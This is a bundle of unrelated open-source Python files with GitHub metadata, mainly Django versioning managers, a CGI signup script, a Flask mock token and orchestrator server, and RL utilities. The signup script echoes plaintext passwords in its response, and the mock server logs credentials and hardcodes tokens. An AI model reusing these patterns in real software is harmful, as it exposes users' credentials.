"copies": "1",
"ref": "refs/heads/master",
"path": "map_fns.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "13873"
},
{
"name": "R",
"bytes": "821"
}
],
"symlink_target": ""
} |
"""
CORE APP
This module provides an interface to the app's managers.
"""
from django.db import models
from django.utils import timezone
from django.contrib.contenttypes.models import ContentType
from django.core.urlresolvers import reverse
from django.template.defaultfilters import slugify
# from polymorphic import PolymorphicManager
from tunobase.core import constants, query
# Normal managers
class VersionManager(models.Manager):
def publish_objects(self):
"""Return only published objects."""
queryset = self.exclude(state=constants.STATE_PUBLISHED)
to_publish_ids = []
for obj in queryset:
published_obj = obj.series.versions.filter(
state=constants.STATE_PUBLISHED
).exists()
if not published_obj and obj.content_object.publish_at <= timezone.now():
to_publish_ids.append(obj.pk)
obj.content_object.state = constants.STATE_PUBLISHED
obj.content_object.save()
update_queryset = self.filter(pk__in=to_publish_ids)
update_queryset.update(state=constants.STATE_PUBLISHED)
class CoreManager(models.Manager):
"""Return relevant objects."""
def get_queryset(self):
"""Return objects."""
return query.CoreQuerySet(self.model, using=self._db)
def for_current_site(self):
"""Return objects for the current site."""
return self.get_queryset().for_current_site()
class CoreStateManager(CoreManager):
"""Return relevant objects depending on state."""
def get_queryset(self):
"""Return objects."""
return query.CoreStateQuerySet(self.model, using=self._db)
def publish_objects(self):
"""Return only published objects."""
queryset = self.permitted().filter(
publish_at__lte=timezone.now()
).exclude(state=constants.STATE_PUBLISHED)
queryset.update(state=constants.STATE_PUBLISHED)
def permitted(self):
"""Only return publised objects."""
return self.get_queryset().permitted()
def get_list(self):
return self.get_queryset().get_list()
def get_console_queryset(self):
return self.get_queryset().get_console_queryset()
def version_list(self, object_id, state):
series = self.get_series(object_id)
if series is not None:
qs = series.versions.filter(state=state)
for model in qs:
model.change_url = reverse('%s_%s_change' % (
model.content_object._meta.app_label,
model.content_object._meta.module_name),
args=(model.object_id,)
)
return qs
return []
def get_series(self, object_id):
from tunobase.core.models import Version
model_type = ContentType.objects.get_for_model(self.model)
try:
return Version.objects.get(
content_type__pk=model_type.id,
object_id=object_id
).series
except:
return None
def add_series(self, slug):
from tunobase.core.models import VersionSeries
return VersionSeries.objects.create(
slug=slug
)
def add_version(self, obj):
from tunobase.core.models import Version
model_type = ContentType.objects.get_for_model(self.model)
series = self.add_series(slugify(str(obj)))
Version.objects.create(
content_type=model_type,
object_id=obj.pk,
series=series,
number=1,
state=obj.state
)
def add_to_series(self, series, obj):
from tunobase.core.models import Version
model_type = ContentType.objects.get_for_model(self.model)
try:
latest_version_number = Version.objects.filter(
series=series
).order_by('-number')[0].number + 1
except:
latest_version_number = 1
Version.objects.create(
content_type=model_type,
object_id=obj.pk,
series=series,
number=latest_version_number,
state=constants.STATE_UNPUBLISHED
)
def stage_version(self, object_id):
from tunobase.core.models import Version
series = self.get_series(object_id)
model_type = ContentType.objects.get_for_model(self.model)
if series is not None and Version.objects.filter(
series=series, state=constants.STATE_STAGED).exists():
staged_version = Version.objects.get(
series=series,
state=constants.STATE_STAGED
)
staged_version.state = constants.STATE_UNPUBLISHED
staged_version.save()
staged_version.content_object.state = constants.STATE_UNPUBLISHED
staged_version.content_object.save()
version = Version.objects.get(
content_type__pk=model_type.id,
object_id=object_id
)
version.state = constants.STATE_STAGED
version.save()
version.content_object.state = constants.STATE_STAGED
version.content_object.save()
def publish_version(self, object_id):
from tunobase.core.models import Version
series = self.get_series(object_id)
model_type = ContentType.objects.get_for_model(self.model)
if series is not None and Version.objects.filter(
series=series, state=constants.STATE_PUBLISHED).exists():
published_version = Version.objects.get(
series=series,
state=constants.STATE_PUBLISHED
)
published_version.state = constants.STATE_UNPUBLISHED
published_version.save()
published_version.content_object.state = constants.STATE_UNPUBLISHED
published_version.content_object.save()
version = Version.objects.get(
content_type__pk=model_type.id,
object_id=object_id
)
version.state = constants.STATE_PUBLISHED
version.save()
version.content_object.state = constants.STATE_PUBLISHED
version.content_object.save()
def unpublish_version(self, object_id):
from tunobase.core.models import Version
model_type = ContentType.objects.get_for_model(self.model)
version = Version.objects.get(
content_type__pk=model_type.id,
object_id=object_id
)
version.state = constants.STATE_UNPUBLISHED
version.save()
version.content_object.state = constants.STATE_UNPUBLISHED
version.content_object.publish_date_time = timezone.now()
version.content_object.save()
def delete_version(self, object_id):
from tunobase.core.models import Version
model_type = ContentType.objects.get_for_model(self.model)
version = Version.objects.get(
content_type__pk=model_type.id,
object_id=object_id
)
version.state = constants.STATE_DELETED
version.save()
version.content_object.state = constants.STATE_DELETED
version.content_object.save()
# # Polymorphic Managers
#
# class CorePolymorphicManager(PolymorphicManager, CoreManager):
#
# def get_queryset(self):
# return query.CorePolymorphicQuerySet(self.model, using=self._db)
#
#
# class CorePolymorphicStateManager(CorePolymorphicManager, CoreStateManager):
#
# def get_queryset(self):
# return query.CorePolymorphicStateQuerySet(self.model, using=self._db)
# Other Managers
class DefaultImageManager(CoreStateManager):
def get_queryset(self):
return query.DefaultImageQuerySet(self.model, using=self._db)
def get_random(self, category=None):
return self.get_queryset().get_random(category)
| {
"content_hash": "001bcaf8b5b0bc01e0ba455babc0d102",
"timestamp": "",
"source": "github",
"line_count": 237,
"max_line_length": 85,
"avg_line_length": 33.28270042194093,
"alnum_prop": 0.6261409736308317,
"repo_name": "unomena/tunobase-core",
"id": "e02933019e3e41d17a5ef3ba6de4808bcc92db4c",
"size": "7888",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "tunobase/core/managers.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "HTML",
"bytes": "9114"
},
{
"name": "Python",
"bytes": "310065"
}
],
"symlink_target": ""
} |
print "Content-type:text/html\n\n"
import MySQLdb
import hashlib
import cgi
import sys
import json
import uuid
def hash_password(password):
salt = uuid.uuid4().hex
return hashlib.sha256(salt.encode() + password.encode()).hexdigest() + ':' + salt
# grab data from POSTed JSON
data = sys.stdin.read()
myjson = json.loads(data)
input_username = myjson['username']
input_password = myjson['password']
try:
conn = MySQLdb.connect (
host = "my_host",
user = "my_user",
passwd = "my_password",
db = "my_db")
#create a cursor for the select
cur = conn.cursor()
#execute a sql query
command = "INSERT INTO User(username, password) VALUES(%s,%s)"
cur.execute(command, (input_username, hash_password(input_password)))
print json.dumps({'username':input_username, 'password':input_password})
except MySQLdb.Error, e:
print json.dumps({'error':"Error %d: %s" % (e.args[0], e.args[1])})
sys.exit (1)
finally:
if cur:
# close the cursor
cur.close()
if conn:
# close the connection
conn.close()
| {
"content_hash": "d1e3b43bb64e24c675c312b517ad8af5",
"timestamp": "",
"source": "github",
"line_count": 44,
"max_line_length": 85,
"avg_line_length": 23.15909090909091,
"alnum_prop": 0.6879293424926398,
"repo_name": "Rovel/ultra-motivator",
"id": "aa43b95ab44e2767f0a364a6e1f259668d8a9e4c",
"size": "1037",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "api/signup.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "77"
},
{
"name": "Python",
"bytes": "11900"
},
{
"name": "Swift",
"bytes": "16866"
}
],
"symlink_target": ""
} |
from flask import Flask
from flask import request
from flask import Response
from functools import wraps
from OpenSSL import SSL
from fgapiserverconfig import FGApiServerConfig
import os
import sys
import json
import logging.config
"""
FutureGateway APIServer front-end
"""
__author__ = "Riccardo Bruno"
__copyright__ = "2015"
__license__ = "Apache"
__version__ = "v0.0.2-30-g37540b8-37540b8-37"
__maintainer__ = "Riccardo Bruno"
__email__ = "riccardo.bruno@ct.infn.it"
# setup path
fgapirundir = os.path.dirname(os.path.abspath(__file__)) + '/'
sys.path.insert(0, os.path.dirname(os.path.abspath(__file__)))
# fgapiserver configuration file
fgapiserver_config_file = fgapirundir + 'fgapiserver.conf'
# Load configuration
fg_config = FGApiServerConfig(fgapiserver_config_file)
# fgapiserver settings
fgapiver = fg_config.get_config_value('fgapiver')
fgapiserver_name = fg_config.get_config_value('fgapiserver_name')
fgapisrv_host = fg_config.get_config_value('fgapisrv_host')
fgapisrv_port = int(fg_config.get_config_value('fgapisrv_port'))
fgapisrv_debug = (fg_config.get_config_value(
'fgapisrv_debug').lower() == 'true')
fgapisrv_iosandbox = fg_config.get_config_value('fgapisrv_iosandbox')
fgapisrv_geappid = int(fg_config.get_config_value('fgapisrv_geappid'))
fgjson_indent = int(fg_config.get_config_value('fgjson_indent'))
fgapisrv_key = fg_config.get_config_value('fgapisrv_key')
fgapisrv_crt = fg_config.get_config_value('fgapisrv_crt')
fgapisrv_logcfg = fg_config.get_config_value('fgapisrv_logcfg')
fgapisrv_dbver = fg_config.get_config_value('fgapisrv_dbver')
fgapisrv_secret = fg_config.get_config_value('fgapisrv_secret')
fgapisrv_notoken = (fg_config.get_config_value(
'fgapisrv_notoken').lower() == 'true')
fgapisrv_notokenusr = fg_config.get_config_value('fgapisrv_notokenusr')
fgapisrv_lnkptvflag = fg_config.get_config_value('fgapisrv_lnkptvflag')
fgapisrv_ptvendpoint = fg_config.get_config_value('fgapisrv_ptvendpoint')
fgapisrv_ptvuser = fg_config.get_config_value('fgapisrv_ptvuser')
fgapisrv_ptvpass = fg_config.get_config_value('fgapisrv_ptvpass')
fgapisrv_ptvdefusr = fg_config.get_config_value('fgapisrv_ptvdefusr')
fgapisrv_ptvmapfile = fg_config.get_config_value('fgapisrv_ptvmapfile')
# fgapiserver database settings
fgapisrv_db_host = fg_config.get_config_value('fgapisrv_db_host')
fgapisrv_db_port = int(fg_config.get_config_value('fgapisrv_db_port'))
fgapisrv_db_user = fg_config.get_config_value('fgapisrv_db_user')
fgapisrv_db_pass = fg_config.get_config_value('fgapisrv_db_pass')
fgapisrv_db_name = fg_config.get_config_value('fgapisrv_db_name')
# Logging
logging.config.fileConfig(fgapisrv_logcfg)
logger = logging.getLogger(__name__)
logger.debug(fg_config.show_conf())
# setup Flask app
app = Flask(__name__)
##
# Authentication
##
def check_auth(username, password):
"""This function is called to check if a username /
password combination is valid.
"""
print "Ckecking for: %s - %s" % (username, password)
return username == fgapisrv_ptvuser and fgapisrv_ptvpass == password
def authenticate():
"""Sends a 401 response that enables basic auth"""
return Response(
'Could not verify your access level for that URL.\n'
'You have to login with proper credentials', 401,
{'WWW-Authenticate': 'Basic realm="Login Required"'}
)
def requires_auth(f):
@wraps(f)
def decorated(*args, **kwargs):
auth = request.authorization
if not auth or not check_auth(auth.username, auth.password):
return authenticate()
return f(*args, **kwargs)
return decorated
##
# PTV handlers
##
#
# /get-token; PTV endpoint to retrieve a new valid token
# Portals normally return a json in the format:
# {
# "error": null,
# "groups": null,
# "subject": "<the-subject>",
# "token": "<the-new-token>"
# }
# This PTV handler totally ignores basic authentication credentials
# (username/password) contained in the request form but needs the
# subject field initially returned by the checktoken/ call
#
@app.route('/get-token', methods=['GET', 'POST'])
@app.route('/%s/get-token' % fgapiver, methods=['GET', 'POST'])
@requires_auth
def get_token():
response = {}
subject = request.values.get('subject')
if request.method == 'GET':
message = "Unhandled method: '%s'" % request.method
response["error"] = message
ctk_status = 400
elif request.method == 'POST':
response = {
"error": None,
"groups": None,
"subject": subject,
"token": "eyJraWQiOiJyc2ExIiwiYWxnIjoiUlMyNTYifQ.eyJzdWIiOiIzYTJkN"
"BmNS0zYmRjLTQwMjAtODJjYi0xMDI4OTQzYzc3N2QiLCJpc3MiOiJodH"
"wczpcL1wvaWFtLXRlc3QuaW5kaWdvLWRhdGFjbG91ZC5ldVwvIiwiZXh"
"IjoxNDc2MjY3NjA2LCJpYXQiOjE0NzYyNjQwMDYsImp0aSI6IjRjN2Y5"
"TczLWJmYzItNDEzYy1hNzhjLWUxZmJlMGU2NjAwYSJ9.BfDlr6Far_oe"
"7z-SuLPbXgfKx3VuHJ0iuL-Dyd6G5_7_rNPrvZr5Da_HJUfonOLr8uOo"
"UhMUIP_Xiw4ZuWVIIhNPDSdu4lhWy5kkcoQ3rI9myNT2WxLA3IP2ZEwP"
"InefF0LzAlMj4-iQQw-kAavKgvA00sO8cww9Hzx6Thfw"
}
ctk_status = 200
else:
message = "Unhandled method: '%s'" % request.method
response["error"] = message
ctk_status = 400
# include _links part
response["_links"] = [{"rel": "self", "href": "/get-token"}, ]
js = json.dumps(response, indent=fgjson_indent)
resp = Response(js, status=ctk_status, mimetype='application/json')
resp.headers['Content-type'] = 'application/json'
return resp
#
# /checktoken; PTV normally uses a portal endpoint to verify incoming Tokens
# Portals normally return a json in the format:
# { "token_status": "<valid|invalid>",
# ["portal_user": "<portal_username>"
# "portal_group": "<portal user group name>" ] }
# Optional fields portal_user and portal_groups are used to map the portal
# user/group with a FutureGateway user/group
# This PTV handler totally ignores basic authentication credentials
# (username/password) contained in the request form
#
@app.route('/get-token-info', methods=['GET', 'POST'])
@app.route('/%s/get-token-info' % fgapiver, methods=['GET', 'POST'])
@app.route('/checktoken', methods=['GET', 'POST'])
@app.route('/%s/checktoken' % fgapiver, methods=['GET', 'POST'])
@requires_auth
def checktoken():
response = {}
token = request.values.get('token')
if request.method == 'GET':
message = "Unhandled method: '%s'" % request.method
response["error"] = message
ctk_status = 400
elif request.method == 'POST':
# response = {
# "token_status": "valid",
# # you may specify:
# # portal_user - A portal user that can be mapped by
# # fgapiserver_ptvmap.json map file
# # portal_group - A portal group that can be mapped by
# # fgapiserver_ptvmap.json map file
# # "portal_user": fgapisrv_ptvdefusr
# "portal_group": "admin"
# }
response = {
"error": None,
"groups": [
"Users",
"Developers"
],
"subject": "a9f37548-4024-4330-88bf-4f43067e6bdb"
}
ctk_status = 200
else:
message = "Unhandled method: '%s'" % request.method
response["error"] = message
ctk_status = 400
# include _links part
response["_links"] = [{"rel": "self", "href": "/checktoken"}, ]
js = json.dumps(response, indent=fgjson_indent)
resp = Response(js, status=ctk_status, mimetype='application/json')
resp.headers['Content-type'] = 'application/json'
return resp
##
# Orchestrator test handler
##
def create_inprogress():
return {
"uuid": "756ed6b2-ed63-4992-a8f8-8d5d8045ae02",
"creationTime": "2016-08-01T12:47+0000",
"status": "CREATE_IN_PROGRESS",
"outputs": {},
"task": "NONE",
"links": [
{
"rel": "self",
"href": ("http://90.147.170.152:8080/orchestrator/deployments/"
"756ed6b2-ed63-4992-a8f8-8d5d8045ae02")
},
{
"rel": "resources",
"href": ("http://90.147.170.152:8080/orchestrator/deployments/"
"756ed6b2-ed63-4992-a8f8-8d5d8045ae02/resources")
},
{
"rel": "template",
"href": ("http://90.147.170.152:8080/orchestrator/deployments/"
"756ed6b2-ed63-4992-a8f8-8d5d8045ae02/template")
}
]
}
return response
def create_failed():
return {
"uuid": "756ed6b2-ed63-4992-a8f8-8d5d8045ae02",
"creationTime": "2016-08-01T12:47+0000",
"updateTime": "2016-08-01T12:47+0000",
"status": "CREATE_FAILED",
"statusReason": ("Error 400: Error Creating Inf.: "
"Some deploys did not proceed "
"successfully: All machines could not be "
"launched: \nAttempt 1: Error launching the VMs of "
"type ambertools_server to cloud ID one of type "
"OpenNebula. Cloud Provider "
"Error: No ONE network found for network: "
"public_net\n"
"Attempt 2: Error launching the VMs of type "
"ambertools_server to cloud ID one of type "
"OpenNebula. "
"Cloud Provider Error: No ONE network found for "
"network: public_net\nAttempt 3: Error "
"launching the "
"VMs of type ambertools_server to cloud ID one of "
" type OpenNebula. Cloud Provider Error: No ONE "
"network found for network: public_net\n\n"),
"outputs": {},
"task": "NONE",
"cloudProviderName": "provider-UPV-GRyCAP",
"links": [
{
"rel": "self",
"href": ("http://90.147.170.152:8080/orchestrator/deployments/"
"756ed6b2-ed63-4992-a8f8-8d5d8045ae02")
},
{
"rel": "resources",
"href": ("http://90.147.170.152:8080/orchestrator/deployments/"
"756ed6b2-ed63-4992-a8f8-8d5d8045ae02/resources")
},
{
"rel": "template",
"href": ("http://90.147.170.152:8080/orchestrator/deployments/"
"756ed6b2-ed63-4992-a8f8-8d5d8045ae02/template")
}
]
}
def create_complete():
return {
"uuid": "1bff4c04-e8b7-43be-8846-a39df1664433",
"creationTime": "2016-04-12T19:34+0000",
"updateTime": "2016-04-12T19:38+0000",
"status": "CREATE_COMPLETE",
"outputs": {
"node_creds": "{password=7Uxz4RJR, user=jobtest}",
"node_ip": "localhost"
},
"task": "NONE",
"links": [
{
"rel": "self",
"href": ("http://90.147.170.152/orchestrator/deployments/"
"1bff4c04-e8b7-43be-8846-a39df1664433")
},
{
"rel": "resources",
"href": ("http://90.147.170.152/orchestrator/deployments/"
"1bff4c04-e8b7-43be-8846-a39df1664433/resources")
},
{
"rel": "template",
"href": ("http://90.147.170.152/orchestrator/deployments/"
"1bff4c04-e8b7-43be-8846-a39df1664433/template")
}
]
}
def check_input():
return {
"parameters": {
"number_cpus": 1,
"memory_size": "1 GB"
},
"template": (
"tosca_definitions_version: tosca_simple_yaml_1_0\n\n"
"imports:\n - indigo_custom_types: "
"https://raw.githubusercontent.com/indigo-dc/tosca-types"
"/master/custom_types.yaml\n\ndescription: TOSCA template "
"for deploying an instance of AmberTools v15\n"
"\ntopology_template:\n"
" inputs:\n number_cpus:\n type: integer\n "
"description: number of cpus required for the instance\n "
"default: 1\n memory_size:\n type: string\n description: "
"ram memory required for the instance\n default: 1 GB\n\n "
"node_templates:\n\n ambertools:\n type: tosca.nodes.indigo."
"Ambertools\n requirements:\n - host: ambertools_server\n\n "
"ambertools_server:\n type: tosca.nodes.indigo.Compute\n "
"capabilities:\n endpoint:\n properties:\n network_name: "
"PUBLIC\n ports:\n ssh_port:\n protocol: tcp\n source: 22\n "
"host:\n properties:\n num_cpus: { get_input: number_cpus }\n "
"mem_size: { get_input: memory_size }\n os:\n properties:\n "
"type: linux\n distribution: ubuntu\n version: 14.04\n "
"image: indigodatacloudapps/ambertools\n\n outputs:\n "
"instance_ip:\n value: { get_attribute: [ ambertools_server, "
"public_address, 0 ] }\n instance_creds:\n value: { "
"get_attribute: [ ambertools_server, endpoint, credential,"
" 0 ] }")
}
@app.route('/orchestrator/deployments/<uuid>', methods=['GET', 'DELETE'])
def orchestrator_deployments_get(uuid):
response = {}
dep_status = 404
token = request.headers.get('Authorization')
if request.method == 'GET':
print "endpoint: /orchestrator/deployments/%s (GET)" % uuid
print "token: %s" % token
dep_status = 200
# response = create_inprogress()
response = create_complete()
# response = create_failed()
elif request.method == 'DELETE':
print "endpoint: /orchestrator/deployments/%s (DELETE)" % uuid
dep_status = 404
response = {"error": "Method not yet implemented"}
print "response: '%s'" % response
js = json.dumps(response, indent=fgjson_indent)
resp = Response(js, status=dep_status, mimetype='application/json')
resp.headers['Content-type'] = 'application/json'
return resp
@app.route('/orchestrator/deployments', methods=['POST'])
def orchestrator_deployments():
response = {}
dep_status = 404
token = request.headers.get('Authorization')
if request.method == 'GET':
dep_status = 404
response = {"error": "Method not supported"}
elif request.method == 'POST':
print "endpoint: /orchestrator/deployments (POST)"
print "token: %s" % token
dep_status = 201
response = create_inprogress()
js = json.dumps(response, indent=fgjson_indent)
resp = Response(js, status=dep_status, mimetype='application/json')
resp.headers['Content-type'] = 'application/json'
return resp
# Common header section
@app.after_request
def after_request(response):
response.headers.add('Access-Control-Allow-Origin', '*')
response.headers.add('Access-Control-Allow-Headers',
'Content-Type,Authorization')
response.headers.add('Access-Control-Allow-Methods',
'GET,PUT,POST,DELETE,PATCH')
response.headers.add('Access-Control-Allow-Credentials', 'true')
response.headers.add('Server', fgapiserver_name)
return response
#
# The app starts here
#
# Now execute accordingly to the app configuration (stand-alone/wsgi)
if __name__ == "__main__":
if len(fgapisrv_crt) > 0 and len(fgapisrv_key) > 0:
context = SSL.Context(SSL.SSLv23_METHOD)
context.use_privatekey_file(fgapisrv_key)
context.use_certificate_file(fgapisrv_crt)
app.run(host=fgapisrv_host, port=fgapisrv_port,
ssl_context=context, debug=fgapisrv_debug)
else:
app.run(host=fgapisrv_host, port=fgapisrv_port+1, debug=fgapisrv_debug)
| {
"content_hash": "a1079d3a1f8d3bf689f29b955c12e628",
"timestamp": "",
"source": "github",
"line_count": 427,
"max_line_length": 79,
"avg_line_length": 37.89695550351288,
"alnum_prop": 0.5997404523544679,
"repo_name": "FutureGateway/geAPIServer",
"id": "282d436fbafe07dccd488446e06b7ceecc34e374",
"size": "16968",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "fgapiserver_ptv.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "PLpgSQL",
"bytes": "4024"
},
{
"name": "Python",
"bytes": "73089"
},
{
"name": "Shell",
"bytes": "4469"
}
],
"symlink_target": ""
} |
"Point website users at configurable on-call administrators"
import codecs as _codecs
from distutils.core import setup
import os.path as _os_path
from django_on_call import __version__
_this_dir = _os_path.dirname(__file__)
setup(
name='django-on-call',
version=__version__,
maintainer='W. Trevor King',
maintainer_email='wking@tremily.us',
url='https://github.com/wking/django-on-call',
download_url='https://github.com/wking/django-on-call/archive/v{}.tar.gz'.format(__version__),
license='BSD License',
platforms=['all'],
description=__doc__,
long_description=_codecs.open(
_os_path.join(_this_dir, 'README'), 'r', encoding='utf-8').read(),
classifiers=[
'Development Status :: 2 - Pre-Alpha',
'Framework :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Topic :: Software Development :: Libraries :: Python Modules',
],
packages=['django_on_call'],
provides=['django_on_call'],
package_data={'django_on_call': ['templates/django_on_call/*.html']},
)
| {
"content_hash": "c281584a0fe13490ea5243f91c93e013",
"timestamp": "",
"source": "github",
"line_count": 41,
"max_line_length": 98,
"avg_line_length": 35.21951219512195,
"alnum_prop": 0.618421052631579,
"repo_name": "wking/django-on-call",
"id": "55345f39509250e21e284e399eaf2d554da34999",
"size": "1444",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Python",
"bytes": "11518"
}
],
"symlink_target": ""
} |
import tensorflow as tf
import numpy as np
from six.moves import xrange
def discount_episode_rewards(rewards=[], gamma=0.99, mode=0):
""" Take 1D float array of rewards and compute discounted rewards for an
episode. When encount a non-zero value, consider as the end a of an episode.
Parameters
----------
rewards : numpy list
a list of rewards
gamma : float
discounted factor
mode : int
if mode == 0, reset the discount process when encount a non-zero reward (Ping-pong game).
if mode == 1, would not reset the discount process.
Examples
----------
>>> rewards = np.asarray([0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1])
>>> gamma = 0.9
>>> discount_rewards = tl.rein.discount_episode_rewards(rewards, gamma)
>>> print(discount_rewards)
... [ 0.72899997 0.81 0.89999998 1. 0.72899997 0.81
... 0.89999998 1. 0.72899997 0.81 0.89999998 1. ]
>>> discount_rewards = tl.rein.discount_episode_rewards(rewards, gamma, mode=1)
>>> print(discount_rewards)
... [ 1.52110755 1.69011939 1.87791049 2.08656716 1.20729685 1.34144104
... 1.49048996 1.65610003 0.72899997 0.81 0.89999998 1. ]
"""
discounted_r = np.zeros_like(rewards, dtype=np.float32)
running_add = 0
for t in reversed(xrange(0, rewards.size)):
if mode == 0:
if rewards[t] != 0: running_add = 0
running_add = running_add * gamma + rewards[t]
discounted_r[t] = running_add
return discounted_r
def cross_entropy_reward_loss(logits, actions, rewards, name=None):
""" Calculate the loss for Policy Gradient Network.
Parameters
----------
logits : tensor
The network outputs without softmax. This function implements softmax
inside.
actions : tensor/ placeholder
The agent actions.
rewards : tensor/ placeholder
The rewards.
Examples
----------
>>> states_batch_pl = tf.placeholder(tf.float32, shape=[None, D])
>>> network = InputLayer(states_batch_pl, name='input')
>>> network = DenseLayer(network, n_units=H, act=tf.nn.relu, name='relu1')
>>> network = DenseLayer(network, n_units=3, name='out')
>>> probs = network.outputs
>>> sampling_prob = tf.nn.softmax(probs)
>>> actions_batch_pl = tf.placeholder(tf.int32, shape=[None])
>>> discount_rewards_batch_pl = tf.placeholder(tf.float32, shape=[None])
>>> loss = tl.rein.cross_entropy_reward_loss(probs, actions_batch_pl, discount_rewards_batch_pl)
>>> train_op = tf.train.RMSPropOptimizer(learning_rate, decay_rate).minimize(loss)
"""
try: # TF 1.0+
cross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(labels=actions, logits=logits, name=name)
except:
cross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=logits, targets=actions)
# cross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(logits, actions)
try: ## TF1.0+
loss = tf.reduce_sum(tf.multiply(cross_entropy, rewards))
except: ## TF0.12
loss = tf.reduce_sum(tf.mul(cross_entropy, rewards)) # element-wise mul
return loss
def log_weight(probs, weights, name='log_weight'):
"""Log weight.
Parameters
-----------
probs : tensor
If it is a network output, usually we should scale it to [0, 1] via softmax.
weights : tensor
"""
with tf.variable_scope(name):
exp_v = tf.reduce_mean(tf.log(probs) * weights)
return exp_v
def choice_action_by_probs(probs=[0.5, 0.5], action_list=None):
"""Choice and return an an action by given the action probability distribution.
Parameters
------------
probs : a list of float.
The probability distribution of all actions.
action_list : None or a list of action in integer, string or others.
If None, returns an integer range between 0 and len(probs)-1.
Examples
----------
>>> for _ in range(5):
>>> a = choice_action_by_probs([0.2, 0.4, 0.4])
>>> print(a)
... 0
... 1
... 1
... 2
... 1
>>> for _ in range(3):
>>> a = choice_action_by_probs([0.5, 0.5], ['a', 'b'])
>>> print(a)
... a
... b
... b
"""
if action_list is None:
n_action = len(probs)
action_list = np.arange(n_action)
else:
assert len(action_list) == len(probs), "Number of actions should equal to number of probabilities."
return np.random.choice(action_list, p=probs)
| {
"content_hash": "02387669b26be272416c8771d21d7145",
"timestamp": "",
"source": "github",
"line_count": 129,
"max_line_length": 112,
"avg_line_length": 35.457364341085274,
"alnum_prop": 0.6058154787931789,
"repo_name": "luoxier/CycleGAN_Tensorlayer",
"id": "f6d5449b87471ffcdfcd46c7138bd1f404bb8616",
"size": "4619",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tensorlayer/rein.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "545698"
}
],
"symlink_target": ""
} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.